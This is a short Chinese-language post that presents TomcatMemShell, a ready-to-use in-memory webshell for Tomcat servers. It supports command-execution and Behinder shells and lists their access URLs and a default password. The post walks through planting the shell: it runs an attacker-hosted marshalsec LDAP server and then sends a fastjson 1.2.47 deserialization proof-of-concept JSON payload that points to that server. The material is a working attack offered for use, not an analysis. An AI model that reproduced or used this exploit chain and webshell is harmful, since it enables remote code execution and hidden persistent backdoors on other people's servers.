拿來即用的內存馬 -- TomcatMemShell
VSole2022-09-10 06:22:13
一、工具簡介
拿來即用的Tomcat7/8/9/10版本Listener/Filter/Servlet內存馬,支持注入CMD內存馬和冰蝎內存馬。
二、使用方法
1、Listener型/Filter型:
CMD內存馬URL:xx.xx.xx.xx/?chan=whoami 冰蝎內存馬URL:xx.xx.xx.xx/ 默認連接密碼:goautomne
2、Servlet型:
CMD內存馬URL: xx.xx.xx.xx/p?chan=whoami 冰蝎內存馬URL: xx.xx.xx.xx/p 默認連接密碼:goautomne
三、利用舉例
以fastjson1.2.47版本的反序列化漏洞為例,將對應Tomcat版本的class文件,這里以ILRain.class為例,上傳到web服務器,并開啟LDAP服務
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102
然后再打入fastjson漏洞的poc,就可以使用冰蝎客戶端去連接了
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://xx.xx.xx.xx:9102/123",
"autoCommit":true
}
}
四、下載地址
項目地址:https://github.com/ce-automne/TomcatMemShell
VSole
網絡安全專家